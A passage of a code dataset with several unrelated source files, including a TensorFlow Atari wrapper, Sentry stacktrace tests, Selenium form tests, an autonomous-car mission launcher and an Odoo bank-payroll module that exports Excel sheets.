tensorflow as tf\n\nfrom algorithms.utils.arguments import default_cfg\nfrom envs.create_env import create_env\n\nATARI_W = ATARI_H = 84\nATARI_DIM = 4\n\nATARI_ACTION_SET = (\n 0,\n 1,\n 2,\n 3,\n)\n\nclass PyProcessAtari:\n \"\"\"Atari wrapper for PyProcess.\"\"\"\n\n def __init__(self, level, config, num_action_repeats, seed, runfiles_path=None, level_cache=None):\n self._observation_spec = ['RGB_INTERLEAVED']\n env_name = 'atari_breakout'\n cfg = default_cfg(env=env_name, algo=None)\n cfg.pixel_format = 'HWC'\n cfg.res_w = ATARI_W\n cfg.res_h = ATARI_H\n self._env = create_env(env_name, cfg=cfg)\n\n def _reset(self):\n self._env.reset()\n\n # def _observation(self, obs):\n # # return [obs, '']\n # return obs\n\n def initial(self):\n obs = self._env.reset()\n return obs\n # return self._observation(obs)\n\n def step(self, action):\n obs, rew, done, info = self._env.step(action)\n done = np.array(done)\n if done:\n obs = self._env.reset()\n # observation = self._observation(obs)\n reward = np.array(rew, dtype=np.float32)\n return reward, done, obs\n\n def close(self):\n self._env.close()\n\n @staticmethod\n def _tensor_specs(method_name, unused_kwargs, constructor_kwargs):\n \"\"\"Returns a nest of `TensorSpec` with the method's output specification.\"\"\"\n\n observation_spec = [\n tf.contrib.framework.TensorSpec([ATARI_H, ATARI_W, ATARI_DIM], tf.uint8),\n # tf.contrib.framework.TensorSpec([], tf.string),\n ]\n\n if method_name == 'initial':\n return observation_spec\n elif method_name == 'step':\n return (\n tf.contrib.framework.TensorSpec([], tf.float32),\n tf.contrib.framework.TensorSpec([], tf.bool),\n observation_spec,\n )\n","sub_path":"environments_atari.py","file_name":"environments_atari.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"483440410","text":"import ast\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\n\ncred = credentials.Certificate(\"./giobot-telegram-firebase.json\")\nfirebase_admin = firebase_admin.initialize_app(\n cred, {\"databaseURL\": \"https://giobot-telegram.firebaseio.com/\"}\n)\nref = db.reference(\"ranking\")\n\n\ndef write_db(git, repos):\n ref.child(git).set({\"git\": git, \"repos\": repos})\n\n\nwrite_db(\"devgiordane\", 15)\n\n\n# def read_db():\n# with open(\"ranking/db.txt\", \"r\", encoding=\"utf-8\") as db:\n# ranking = ast.literal_eval(db.read())\n# return ranking\n\n\ndef gen_ranking():\n ranking = ref.get()\n lista = sorted(ranking.values(), key=lambda x: x[\"repos\"], reverse=True)\n msg = \"\"\n for i, user in enumerate(lista):\n if i < 10:\n msg += f'{i+1}º {user[\"git\"]} com {user[\"repos\"]} repos \\n'\n return msg\n","sub_path":"ranking/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218521343","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models import F\nfrom django.urls import reverse\n\n\nclass Blog(models.Model):\n author = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Дата и время создания',\n )\n name = models.CharField(\n max_length=500,\n verbose_name='Наименование',\n )\n image = models.ImageField(\n upload_to='%Y/%m/%d/',\n blank=True,\n null=True,\n 
verbose_name='Изображение',\n )\n text = models.TextField(\n verbose_name='Текст',\n )\n views = models.PositiveIntegerField(\n default=0,\n verbose_name='Количество просмотров',\n )\n\n class Meta:\n ordering = ['-created_at']\n\n def __str__(self) -> str:\n return str(self.name)\n\n def get_absolute_url(self):\n return reverse('blogs:blog-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('blogs:blog-update', kwargs={'pk': self.pk})\n\n def get_delete_url(self):\n return reverse('blogs:blog-delete', kwargs={'pk': self.pk})\n\n def increment_views(self):\n self.views = F('views') + 1\n self.save()\n","sub_path":"zhmach/apps/blogs/models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87963404","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport functools\n\nimport mock\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom exam import fixture\n\nfrom sentry.interfaces.stacktrace import (\n Frame, Stacktrace, get_context, is_url, slim_frame_data,\n trim_function_name\n)\nfrom sentry.models import Event\nfrom sentry.testutils import TestCase\n\n\ndef test_is_url():\n assert is_url('http://example.org/') is True\n assert is_url('https://example.org/') is True\n assert is_url('file:///tmp/filename') is True\n assert is_url('applewebdata://00000000-0000-1000-8080-808080808080') is True\n assert is_url('app:///index.bundle') is False # react native\n assert is_url('webpack:///./app/index.jsx') is False # webpack bundle\n assert is_url('data:,') is False\n assert is_url('blob:\\x00') is False\n\n\ndef test_trim_function_name():\n assert trim_function_name('+[foo:(bar)]', 'objc') == '+[foo:(bar)]'\n assert trim_function_name('[foo:(bar)]', 'objc') == '[foo:(bar)]'\n assert trim_function_name('-[foo:(bar)]', 'objc') == '-[foo:(bar)]'\n assert trim_function_name(\n '(anonymous namespace)::foo(int)',\n 'native') == '(anonymous namespace)::foo'\n assert trim_function_name('foo::bar::foo(int)', 'native') == 'foo::bar::foo'\n\n\nclass GetContextTest(TestCase):\n def test_works_with_empty_filename(self):\n result = get_context(0, 'hello world')\n assert result == [(0, 'hello world')]\n\n\nclass StacktraceTest(TestCase):\n @fixture\n def interface(self):\n return Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo/bar.py'\n }, {\n 'filename': 'foo/baz.py',\n 'lineno': 1,\n 'in_app': True,\n }\n ]\n )\n )\n\n def test_null_values(self):\n sink = {}\n\n assert Stacktrace.to_python({}).to_json() == sink\n assert Stacktrace.to_python({'frames': None}).to_json() == sink\n assert Stacktrace.to_python({'frames': []}).to_json() == sink\n\n # TODO(markus): Should eventually generate frames: [None]\n assert Stacktrace.to_python({'frames': [None]}).to_json() == {}\n\n def test_null_values_in_frames(self):\n sink = {'frames': [{}]}\n\n assert Stacktrace.to_python({'frames': [{}]}).to_json() == sink\n assert Stacktrace.to_python({'frames': [{'abs_path': None}]}).to_json() == sink\n\n def test_legacy_interface(self):\n # Simple test to ensure legacy data works correctly with the ``Frame``\n # objects\n event = self.event\n interface = Stacktrace.to_python(event.data['stacktrace'])\n assert len(interface.frames) == 2\n assert interface == event.interfaces['stacktrace']\n\n def test_filename(self):\n Stacktrace.to_python(dict(frames=[{\n 'filename': 'foo.py',\n }]))\n 
Stacktrace.to_python(dict(frames=[{\n 'lineno': 1,\n 'filename': 'foo.py',\n }]))\n\n def test_allows_abs_path_without_filename(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'abs_path': 'foo/bar/baz.py',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == 'foo/bar/baz.py'\n assert frame.abs_path == frame.filename\n\n def test_coerces_url_filenames(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'filename': 'http://foo.com/foo.js',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == '/foo.js'\n assert frame.abs_path == 'http://foo.com/foo.js'\n\n def test_does_not_overwrite_filename(self):\n interface = Stacktrace.to_python(\n dict(\n frames=[{\n 'lineno': 1,\n 'filename': 'foo.js',\n 'abs_path': 'http://foo.com/foo.js',\n }]\n )\n )\n frame = interface.frames[0]\n assert frame.filename == 'foo.js'\n assert frame.abs_path == 'http://foo.com/foo.js'\n\n def test_ignores_results_with_empty_path(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'filename': 'http://foo.com',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == 'http://foo.com'\n assert frame.abs_path == frame.filename\n\n def test_serialize_returns_frames(self):\n interface = Stacktrace.to_python(dict(frames=[{\n 'lineno': 1,\n 'filename': 'foo.py',\n }]))\n result = interface.to_json()\n assert 'frames' in result\n\n def test_frame_hard_limit(self):\n hard_limit = settings.SENTRY_STACKTRACE_FRAMES_HARD_LIMIT\n interface = Stacktrace.to_python(\n {\n 'frames': [\n {\n 'filename': 'Application.java',\n 'function': 'main',\n 'lineno': i, # linenos from 1 to the hard limit + 1\n } for i in range(1, hard_limit + 2)\n ]\n }\n )\n\n assert len(interface.frames) == hard_limit\n assert interface.frames[0].lineno == 1\n assert interface.frames[-1].lineno == hard_limit + 1\n # second to last frame (lineno:250) should be removed\n assert interface.frames[-2].lineno == hard_limit - 1\n\n @mock.patch('sentry.interfaces.stacktrace.Stacktrace.get_stacktrace')\n def test_to_string_returns_stacktrace(self, get_stacktrace):\n event = mock.Mock(spec=Event())\n interface = Stacktrace(frames=[])\n result = interface.to_string(event)\n get_stacktrace.assert_called_once_with(event, system_frames=False, max_frames=10)\n self.assertEquals(result, get_stacktrace.return_value)\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_only_filename(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(dict(frames=[{'filename': 'foo'}, {'filename': 'bar'}]))\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result, 'Stacktrace (most recent call last):\\n\\n File \"foo\"\\n File \"bar\"'\n )\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_module(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(dict(frames=[{'module': 'foo'}, {'module': 'bar'}]))\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result, 'Stacktrace (most recent call last):\\n\\n Module \"foo\"\\n Module \"bar\"'\n )\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_filename_and_function(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo',\n 'function': 'biz'\n }, {\n 'filename': 
'bar',\n 'function': 'baz'\n }\n ]\n )\n )\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result,\n 'Stacktrace (most recent call last):\\n\\n File \"foo\", in biz\\n File \"bar\", in baz'\n )\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_filename_function_lineno_and_context(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo',\n 'function': 'biz',\n 'lineno': 3,\n 'context_line': ' def foo(r):'\n },\n {\n 'filename': 'bar',\n 'function': 'baz',\n 'lineno': 5,\n 'context_line': ' return None'\n },\n ]\n )\n )\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result,\n 'Stacktrace (most recent call last):\\n\\n File \"foo\", line 3, in biz\\n def foo(r):\\n File \"bar\", line 5, in baz\\n return None'\n )\n\n def test_bad_input(self):\n assert Frame.to_python({\n 'filename': 1,\n }).filename is None\n\n assert Frame.to_python({\n 'filename': 'foo',\n 'abs_path': 1,\n }).abs_path == 'foo'\n\n assert Frame.to_python({\n 'function': 1,\n }).function is None\n\n assert Frame.to_python({\n 'module': 1,\n }).module is None\n\n assert Frame.to_python({\n 'function': '?',\n }).function is None\n\n def test_context_with_nan(self):\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('inf')\n },\n }).vars,\n {'x': ''},\n )\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('-inf')\n },\n }).vars,\n {'x': '<-inf>'},\n )\n self.assertEquals(\n Frame.to_python({\n 'filename': 'x',\n 'vars': {\n 'x': float('nan')\n },\n }).vars,\n {'x': ''},\n )\n\n def test_address_normalization(self):\n interface = Frame.to_python(\n {\n 'lineno': 1,\n 'filename': 'blah.c',\n 'function': 'main',\n 'instruction_addr': 123456,\n 'symbol_addr': '123450',\n 'image_addr': '0x0',\n }\n )\n assert interface.instruction_addr == '0x1e240'\n assert interface.symbol_addr == '0x1e23a'\n assert interface.image_addr == '0x0'\n\n\nclass SlimFrameDataTest(TestCase):\n def test_under_max(self):\n interface = Stacktrace.to_python({'frames': [{'filename': 'foo'}]})\n slim_frame_data(interface, 4)\n assert len(interface.frames) == 1\n assert not interface.frames_omitted\n\n def test_over_max(self):\n values = []\n for n in range(5):\n values.append(\n {\n 'filename': 'frame %d' % n,\n 'vars': {\n 'foo': 'bar'\n },\n 'context_line': 'b',\n 'pre_context': ['a'],\n 'post_context': ['c'],\n }\n )\n interface = Stacktrace.to_python({'frames': values})\n slim_frame_data(interface, 4)\n\n assert len(interface.frames) == 5\n\n for value, num in zip(interface.frames[:2], range(2)):\n assert value.filename == 'frame %d' % num\n assert value.vars is not None\n assert value.pre_context is not None\n assert value.post_context is not None\n\n for value, num in zip(interface.frames[3:], range(3, 5)):\n assert value.filename == 'frame %d' % num\n assert value.vars is not None\n assert value.pre_context is not None\n assert value.post_context is not None\n\n value = interface.frames[2]\n assert value.filename == 'frame 2'\n assert not value.vars\n assert not value.pre_context\n assert not value.post_context\n\n\ndef test_java_frame_rendering():\n render = functools.partial(render_to_string, 'sentry/partial/frames/java.txt')\n\n # This is the ideal case.\n assert render(\n {\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': 1,\n }\n ).strip() == 'at 
com.getsentry.example.Example.test(Example.java:1)'\n\n # Legacy support for frames without filename.\n assert render({\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'lineno': 1,\n }).strip() == 'at com.getsentry.example.Example.test'\n\n # (This shouldn't happen, but...)\n assert render(\n {\n 'module': 'com.getsentry.example.Example',\n 'function': 'test',\n 'filename': 'foo/bar/Example.java',\n 'lineno': 1,\n }\n ).strip() == 'at com.getsentry.example.Example.test(Example.java:1)'\n\n # Native methods don't have line numbers.\n assert render({\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': -2,\n }).strip() == 'at test(Example.java)'\n\n assert render({\n 'function': 'test',\n 'filename': 'Example.java',\n 'lineno': 1,\n }).strip() == 'at test(Example.java:1)'\n","sub_path":"tests/sentry/interfaces/test_stacktrace.py","file_name":"test_stacktrace.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649413472","text":"import unittest\n\nfrom selenium import webdriver\n\n\ndef fill_form(link):\n browser = webdriver.Chrome()\n browser.get(link)\n\n browser.find_element_by_css_selector(\".first:required\").send_keys(\"Abc\")\n browser.find_element_by_css_selector(\".second:required\").send_keys(\"Def\")\n browser.find_element_by_css_selector(\".third:required\").send_keys(\"abc@mailmail.mail\")\n browser.find_element_by_css_selector(\"button.btn\").click()\n\n return browser.find_element_by_tag_name(\"h1\").text\n\n\nclass TestReg(unittest.TestCase):\n def test_reg1(self):\n self.assertEqual(fill_form(\"http://suninjuly.github.io/registration1.html\"),\n \"Congratulations! You have successfully registered!\", \"registration is failed\")\n\n def test_reg2(self):\n self.assertEqual(fill_form(\"http://suninjuly.github.io/registration2.html\"),\n \"Congratulations! You have successfully registered!\", \"registration is failed\")\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"Section 3/lesson2_step13_unittest_s1l6s11_reg_all.py","file_name":"lesson2_step13_unittest_s1l6s11_reg_all.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264236011","text":"# Substring with Concatenation of All Words\n# You are given a string, S, and a list of words, L, that are all of the same length. 
Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\n# For example, given:\n# S: \"barfoothefoobarman\"\n# L: [\"foo\", \"bar\"]\n\n# You should return the indices: [0,9].\n# (order does not matter).\n\n\n# Solution: \n# - Brute force is O(len(S) * len(L) * len(L[0])), which is too slow\n# - My Solution:\n# + Use a dict to host the words in L, speed up the word validation operation\n# + Create a seperate iterator to make the code more readable\n# + Using dict instead of set, because there might be duplicate words in L\n# + Maintain a moving window of current matched words, (It's actually a queue)\n\n# Bugs:\n# - A typo \"S\" => \"s\", this polluted the namespace\n# - Forget to clear the words variable at LINE[52]\n\nclass Solution:\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n def findSubstring(self, S, L):\n def stringWordify(S, offset, wl):\n wc = (len(S) - offset)//wl\n for i in range(wc):\n yield (offset + i* wl, S[offset + i * wl: offset + i * wl + wl])\n\n if len(S) == 0 or len(L) == 0:\n return []\n wl = len(L[0]) # single word length\n wc = len(L) # total word count\n sl = len(S) # string length\n if wl == 0 or sl < wl * wc:\n return []\n\n dct = {}\n for w in L:\n if not w in dct:\n dct[w] = 0\n dct[w] += 1 \n\n result = []\n for offset in range(wl):\n # Use offset to avoid updating every words in checking\n cache = {}\n words = []\n # Iterate over words with index \n for index, w in stringWordify(S, offset, wl):\n if (not w in dct): \n # start new matching if w is not in L\n cache = {}\n words = []\n else:\n # push the w into cache\n words.append((index,w))\n if not w in cache:\n cache[w] = 0\n cache[w] += 1\n\n if cache == dct:\n # if cache is equal to dct, save the result\n result.append(words[0][0])\n\n # rotate the cache if needed\n if len(words) >= wc or cache[w] > dct[w]:\n index, drop = words[0]\n words = words[1:] if wc > 1 else []\n cache[drop] -= 1\n return result","sub_path":"030_SubstringWithConcatenationOfAllWords/substring_concatenation.py","file_name":"substring_concatenation.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30346506","text":"import os\nimport sys\nsys.path.append(\".\")\nsys.path.append(\"C:\\\\Users\\\\HEVEN\\\\darknet\\\\build\\\\darknet\\\\x64\")\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nfrom src.Database import Database\nfrom Control.Control import Control\nfrom Path import Path\nfrom Mission import MissionManager, SampleMission, TrafficLightMission, NarrowMission, UturnMission, TargetCarMission, DefaultMission, ParkingMission, CrosswalkMission, DefaultMission2\nfrom YOLO.thread_yolo import YOLO\nimport time\n\n\ndef main():\n db = Database(gps=False, imu=False) \n db.start()\n\n yolo = YOLO(db=db)\n yolo.start()\n \n path = Path(db=db)\n control = Control(db=db, path=path)\n\n # 미션 매니저 생성\n mission_manager = MissionManager(db=db)\n\n # 수행할 미션 순서\n mission_manager.mission_keys =\\\n [\"TrafficLight\", \"Default2\", \"Narrow\", \"U-Turn\",\n \"Target_Car\", \"Default\", \"Parking\",\n \"CrossWalk\"]\n\n # 시작 미션 할당(일반적인 경우 0번째 미션부터 시작)\n mission_manager.mission_idx = 0\n mission_manager.current_mission_key = mission_manager.mission_keys[mission_manager.mission_idx]\n\n # 수행할 미션들을 생성\n trafficlight_mission = TrafficLightMission(db=db, control=control, path=path)\n narrow_mission = 
NarrowMission(db=db, control=control, path=path)\n uturn_mission = UturnMission(db=db, control=control, path=path)\n target_mission = TargetCarMission(db=db, control=control, path=path)\n default_mission = DefaultMission(db=db, control=control, path=path)\n default_mission2 = DefaultMission2(db=db, control=control, path=path)\n parking_mission = ParkingMission(db=db, control=control, path=path)\n crosswalk_mission = CrosswalkMission(db=db, control=control, path=path)\n \n # 미션 매니저에 수행할 미션들을 추가.\n mission_manager.add_mission(key=\"TrafficLight\", mission=trafficlight_mission)\n mission_manager.add_mission(key=\"Narrow\", mission=narrow_mission)\n mission_manager.add_mission(key=\"U-Turn\", mission=uturn_mission)\n mission_manager.add_mission(key=\"Target_Car\", mission=target_mission)\n mission_manager.add_mission(key=\"Default\", mission=default_mission)\n mission_manager.add_mission(key=\"Default2\", mission=default_mission2)\n mission_manager.add_mission(key=\"Parking\", mission=parking_mission)\n mission_manager.add_mission(key=\"CrossWalk\", mission=crosswalk_mission)\n\n mission_manager.start()\n \n while True:\n if db.flag.system_stop:\n break\n else:\n try:\n print(mission_manager.current_mission_key)\n print(db.mission)\n time.sleep(1)\n except KeyboardInterrupt:\n print(\"Keyboard Interrupt detected!\")\n db.flag.system_stop = True\n break\n \n yolo.join()\n mission_manager.join()\n db.join()\n\n return 0\n\nif __name__ == \"__main__\":\n if main() == 0:\n print(\"\\nAutonomous-Car-System terminated successfully!\")\n else:\n print(\"\\nThere is something wrong. I recommend you to kill every processes which is related to this program.\")\n","sub_path":"PAMS_2019/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"41261861","text":"import xlwt\n\nimport base64\nfrom openerp import models, fields, api\nfrom cStringIO import StringIO\nfrom openerp.addons.hr_payroll_ezra.parameters import constants\n\nPAYROLL_STATE_STATUS = [\n ('draft', 'Draft'),\n ('approved', 'Approved'),\n ('post', 'Paid')\n]\n\n\nclass BankPayrollMain(models.Model):\n _name = 'payroll.bank.template'\n _description = 'Bank Payroll Template'\n _inherit = 'mail.thread'\n\n @api.one\n def legacy_doc1_getFilename(self):\n self.filename = self.name + ' Bank Payroll.xls'\n\n name = fields.Char('Bank Payroll Name', required=True)\n payroll_period = fields.Many2one('hr.payroll.main','Payroll Period')\n\n payroll_month_of = fields.Selection(constants.MONTH_SELECTION, 'for the Month of', required=True)\n payroll_month_quarter = fields.Selection(constants.MONTH_QUARTER_SELECTION,'Month Quarter', required=True)\n payroll_year = fields.Integer('for the Year', default = constants.YEAR_NOW, required=True)\n\n employee_name = fields.Many2one('hr.employee', 'Employee Name')\n total_amount_debit = fields.Float('Total Debit', readonly = True)\n total_amount_check = fields.Float('Total Check', readonly = True)\n total_amount = fields.Float('Grand Total', readonly = True)\n state = fields.Selection(PAYROLL_STATE_STATUS, 'Status', default = 'draft')\n approved_by_id = fields.Many2one('res.users', 'Approver')\n posted_by_id = fields.Many2one('res.users', 'Posted by')\n payroll_bank_main_id = fields.One2many('payroll.bank.template.detail', 'bank_payroll_detail_id', readonly=False, copy=False)\n payroll_bank_main_check_id = fields.One2many('payroll.bank.template.detail.check', 'bank_payroll_detail_id', 
readonly=False, copy=False)\n\n\n filename = fields.Char('file name', readonly = True,store = False,compute ='legacy_doc1_getFilename')\n payroll_file = fields.Binary('Generate Bank Payroll')\n\n def getUseridName(self):\n return self.env['res.users'].search([('id','=', self._uid)]).name\n\n @api.one\n def generateBank(self):\n self.total_amount = 0\n self.payroll_file = None\n\n bankpayroll_check_detail =self.env['payroll.bank.template.detail.check']\n bank_check_det = bankpayroll_check_detail.search([('bank_payroll_detail_id', '=', self.id)])\n bank_check_det.unlink()\n\n bankpayroll_detail = self.env['payroll.bank.template.detail']\n bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n bank_det.unlink()\n # For Per Project Assigned Selection\n if len(self.payroll_period) > 0:\n self.total_amount = 0\n self.total_amount_debit = 0\n self.total_amount_check = 0\n for period in self.payroll_period.payroll_main_id:\n if len(period.employee_id.bank_account_id) > 0:\n if isinstance(period.employee_id.bank_account_id.acc_number, bool):\n account_number =\"\"\n else:\n account_number = period.employee_id.bank_account_id.acc_number.replace(\"-\",\"\")\n\n if len(self.employee_name) > 0:\n if self.employee_name == period.employee_id:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': period.employee_id.last_name + ', ' + period.employee_id.first_name,\n 'account_number': account_number ,\n 'amount': round(period.net_pay,2)\n })\n self.total_amount += round(period.net_pay,2)\n else:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': period.employee_id.last_name + ', ' + period.employee_id.first_name,\n 'account_number': period.employee_id.bank_account_id.acc_number,\n 'amount': round(period.net_pay,2)\n })\n self.total_amount += round(period.net_pay,2)\n else:\n self.total_amount = 0\n self.total_amount_debit = 0\n self.total_amount_check = 0\n payroll_detail = self.env['hr.payroll.detail'].search([('month_half_period', '=', self.payroll_month_quarter),\n ('month_name_period', '=', self.payroll_month_of),\n ('year_payroll_period', '=', self.payroll_year),\n ('payroll_detail_id.state', '=', 'approved')])\n if len(payroll_detail) > 0:\n for employee in payroll_detail:\n if isinstance(employee.employee_id.bank_account_id.acc_number, bool):\n account_number = \"\"\n else:\n account_number = employee.employee_id.bank_account_id.acc_number.replace(\"-\",\"\")\n # Employee Has no Bank Account Number\n if len(employee.employee_id.bank_account_id) > 0:\n if len(self.employee_name) > 0:\n if self.employee_name == employee.employee_id:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': account_number,\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_debit += round(employee.net_pay,2)\n else:\n bankpayroll_detail.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': account_number,\n 'amount': round(employee.net_pay,2)\n })\n self.total_amount_debit += round(employee.net_pay,2)\n else:\n if len(self.employee_name) > 0:\n if self.employee_name == employee.employee_id:\n bank_check_det.create(\n {\n 'bank_payroll_detail_id': self.id,\n 'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n 'account_number': \"\",\n 'amount': round(employee.net_pay,2)\n })\n 
self.total_amount_check += round(employee.net_pay,2)\n                        else:\n                            bank_check_det.create(\n                                {\n                                    'bank_payroll_detail_id': self.id,\n                                    'name': employee.employee_id.last_name + ', ' + employee.employee_id.first_name,\n                                    'account_number': \"\",\n                                    'amount': round(employee.net_pay,2)\n                                })\n                            self.total_amount_check += round(employee.net_pay,2)\n            self.total_amount = self.total_amount_debit + self.total_amount_check\n        self.generateExcelFile()\n\n    @api.one\n    def generateExcelFile(self):\n\n        #self.total_amount = 0\n        self.payroll_file = None\n\n        #Creation of Excel File\n        workbook = xlwt.Workbook()\n\n        #With Account Number\n        sheet = workbook.add_sheet(\"Bank Payroll Debit\",True)\n\n        bankpayroll_detail = self.env['payroll.bank.template.detail']\n        bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n\n        # Create Title\n        sheet.write(0, 0, \"Account Number\")\n        sheet.write(0, 1, \"Name\")\n        sheet.write(0, 2, \"Amount\")\n\n        sheet.col(0).width = 8000 # around 220 pixels\n        sheet.col(1).width = 8000 # around 220 pixels\n        sheet.col(2).width = 8000 # around 220 pixels\n        i =1\n        for employee in bank_det:\n            #sheet.col(i).width = 8000 # around 220 pixels\n            sheet.write(i, 0, employee.account_number)\n            sheet.write(i, 1, employee.name)\n            sheet.write(i, 2, employee.amount)\n            i += 1  # advance to the next row\n\n\n        # For Employee With no Account Number\n        sheet = workbook.add_sheet(\"Bank Payroll Check\",True)\n\n        bankpayroll_detail = self.env['payroll.bank.template.detail.check']\n        bank_det = bankpayroll_detail.search([('bank_payroll_detail_id', '=', self.id)])\n\n        # Create Title\n        #sheet.write(0, 0, \"Account Number\")\n        sheet.write(0, 0, \"Name\")\n        sheet.write(0, 1, \"Amount\")\n\n        sheet.col(0).width = 8000 # around 220 pixels\n        sheet.col(1).width = 8000 # around 220 pixels\n        sheet.col(2).width = 8000 # around 220 pixels\n        i =1\n        for employee in bank_det:\n            sheet.col(i).width = 8000 # around 220 pixels\n            sheet.write(i, 0, employee.name)\n            sheet.write(i, 1, employee.amount)\n            i +=1\n\n        fp = StringIO()\n        workbook.save(fp)\n        fp.seek(0)\n        data = fp.read()\n        fp.close()\n        byte_arr = base64.b64encode(data)\n        self.payroll_file = byte_arr\n\n    @api.one\n    def postDraft(self):\n        message =\"\"\"Bank Payroll\n
<br/>Status: Approved->Draft<br/>\n<br/>Re-check by: %(user)s<br/>\n<br/>Type: Rechecking of Bank Payroll<br/>
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[0][0]\n self.approved_by_id = None\n self.posted_by_id = None\n\n @api.one\n def postApproved(self):\n message =\"\"\"Bank Payroll\n
<br/>Status: Draft->Approved<br/>\n<br/>Re-check by: %(user)s<br/>\n<br/>Type: Approve of Bank Payroll<br/>
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[1][0]\n self.approved_by_id = self._uid\n\n @api.one\n def post(self):\n message =\"\"\"Bank Payroll\n
<br/>Status: Approved->Paid<br/>\n<br/>Re-check by: %(user)s<br/>\n<br/>Type: Paid of Bank Payroll<br/>
\n \"\"\" %{'user': self.getUseridName()}\n self.message_post(body=message)\n\n self.state = PAYROLL_STATE_STATUS[2][0]\n self.posted_by_id = self._uid\n\nclass BankPayrollDetail(models.Model):\n _name = 'payroll.bank.template.detail'\n _description = 'Bank Payroll Template Detail'\n _order = 'account_number,name'\n\n bank_payroll_detail_id = fields.Many2one('payroll.bank.template')\n name = fields.Char('Name')\n account_number = fields.Char('Account Number')\n amount = fields.Char('Amount')\n\nclass BankPayrollDetail(models.Model):\n _name = 'payroll.bank.template.detail.check'\n _description = 'Bank Payroll Template Detail Check'\n _order = 'account_number,name'\n\n #@api.one\n #def _getTotalAmount(self):\n # total_amount = 0\n # model_payroll_check = self.env['payroll.bank.template.detail.check'].search([('bank_payroll_detail_id', '=', self.bank_payroll_detail_id.id)])\n # for employee_payroll in model_payroll_check:\n # curr_amount = 0\n # if not isinstance(employee_payroll.amount, bool):\n # curr_amount = employee_payroll.amount\n # self.total_amount += curr_amount\n\n bank_payroll_detail_id = fields.Many2one('payroll.bank.template')\n name = fields.Char('Name')\n account_number = fields.Char('Account Number')\n amount = fields.Char('Amount')\n\n #total_amount = fields.Float('Total', 